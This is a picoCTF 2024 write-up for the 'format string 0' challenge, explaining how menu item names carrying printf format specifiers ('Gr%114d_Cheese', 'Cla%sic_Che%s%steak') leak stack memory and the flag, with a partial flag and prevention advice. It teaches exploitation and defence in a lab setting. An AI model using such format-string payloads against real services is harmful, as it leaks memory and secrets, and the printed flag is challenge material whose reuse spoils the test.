format string 0 picoCTF 2024 Solution

Published: April 3, 2024

Description

Can you use your knowledge of format strings to make the customers happy?

Remote menu

Connect to mimas.picoctf.net <PORT_FROM_INSTANCE> via netcat.

Observe the menu items in each round and look for strings containing %.

bash
nc mimas.picoctf.net <PORT_FROM_INSTANCE>
This is the introductory format string challenge. Once you understand how format specifiers leak data here, progress to format string 1 for stack leaking and format string 2 for memory overwrites. The Buffer Overflow and Binary Exploitation guide covers format string vulnerabilities in depth alongside stack overflows and heap exploitation.
  1. Step 1Round 1
    You don't type %114d into nc directly. You select the menu item whose name is Gr%114d_Cheese and the server passes that string to printf. Because fgets only pushed the buffer pointer (no extra ints), %d renders whatever stack garbage sits at the next slot, padded to width 114, leaking the bytes. See the format string guide for the full leak primitive.
    bash
    Gr%114d_Cheese
    Learn more

    A format string vulnerability occurs when user-controlled input is passed directly as the format string argument to printf() or similar functions. Instead of printf("%s", user_input), the vulnerable code calls printf(user_input). This allows an attacker to inject format specifiers like %d, %s, %p, and %n that cause printf to read from (or write to) the stack.

    The %114d specifier tells printf to print an integer with a minimum field width of 114 characters. Since there's no corresponding integer argument on the stack for this extra specifier, printf reads whatever value happens to be on the stack next - which could be a return address, a pointer, or sensitive data. This is called stack data leakage.

    What printf does with "Gr%114d_Cheese" when nothing else is pushed:
    
      arg slot 1: rsi (or [rsp+0x00] if 6 args were already used)
                  -> printf reads it as int, prints with width 114
                  -> result is 114-char-wide ASCII rendering of
                     whatever happened to be at that stack slot
    
    Output:
      Gr<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<...123456789>_Cheese
    
    The "leaked int" is part of a saved register or canary frame
    the function used before calling printf.

    Format string bugs were extremely prevalent in the late 1990s and early 2000s, leading to high-profile exploits in syslog, wu-ftpd, and many other servers. While modern compilers produce warnings for printf(user_input), the vulnerability still appears in legacy code, embedded systems, and cases where the format string is dynamically constructed.

    The OWASP Testing Guide includes format string testing as part of input validation testing. Fuzzing tools like AFL and libFuzzer can automatically detect format string vulnerabilities by monitoring for crashes or unusual output when format specifiers are injected into inputs.

  2. Step 2Round 2
    Select Cla%sic_Che%s%steak so printf interprets each %s and prints arbitrary stack entries, eventually revealing picoCTF{...}.
    bash
    Cla%sic_Che%s%steak
    Learn more

    The %s specifier tells printf to treat the next stack argument as a pointer and print the null-terminated string at that address. When there's no corresponding argument, printf reads the next value off the stack and treats it as a string pointer. If that value happens to point to readable memory containing the flag, it gets printed. If it points to unmapped memory, the program crashes with a SEGFAULT - which explains the flag text SEGFAULT in the flag.

    Format string: "Cla%sic_Che%s%steak"
    
    printf walks specifiers in order:
      %s #1 -> deref rsi/rdx/... as char*  -> dump bytes until \0
      %s #2 -> deref next arg              -> dump bytes until \0
      %s #3 -> deref next arg              -> dump bytes until \0
    
    Three reads = three chances that one of the leaked pointers
    happens to point at a buffer containing "picoCTF{...}".
    
    Common winners on this binary:
      - the flag is read into a stack-resident char buf[]
      - that buf's address is sitting on the stack right above
        the printf frame because main called read(buf,...)
      - one of the %s walks lands on that pointer and prints
        the flag verbatim

    Chaining multiple %s specifiers (%s%s%s...) walks further up the stack, reading more memory with each specifier. The attacker doesn't need to know the exact stack layout in advance - they can spray many specifiers and observe which one prints useful data. This brute-force approach makes format string bugs practical even without debugging access.

    The specific menu item names in this challenge are cleverly crafted to hide the format specifiers in plain sight. Cla%sic looks like "Classic" with a typo; Che%s%steak resembles "Cheesesteak." This social engineering aspect - making malicious input look benign - is a technique used in real attacks where format strings appear in log entries, usernames, or other inputs that humans might not scrutinize carefully.

Flag

picoCTF{7h3_cu570m3r_15_n3v3r_SEGFAULT_dc...}

Ordering the format-string specials leaks the flag directly in the connection output.

How to prevent this

Format string bugs are 100% preventable at compile time. Every modern toolchain ships the controls.

  • Always pass user input as an argument, never as the format itself: printf("%s", user_input), not printf(user_input). Same rule for fprintf, sprintf, syslog, snprintf.
  • Compile with -Wformat -Wformat-security -Werror=format-security. GCC and Clang will refuse to build the bad pattern. Add _FORTIFY_SOURCE=2 for extra runtime checks on %n.
  • In code review, treat any dynamically built format string as a finding. If the format genuinely needs to be variable, build it from a fixed allowlist, never from request data.

Want more picoCTF 2024 writeups?

Tools used in this challenge

Related reading

What to try next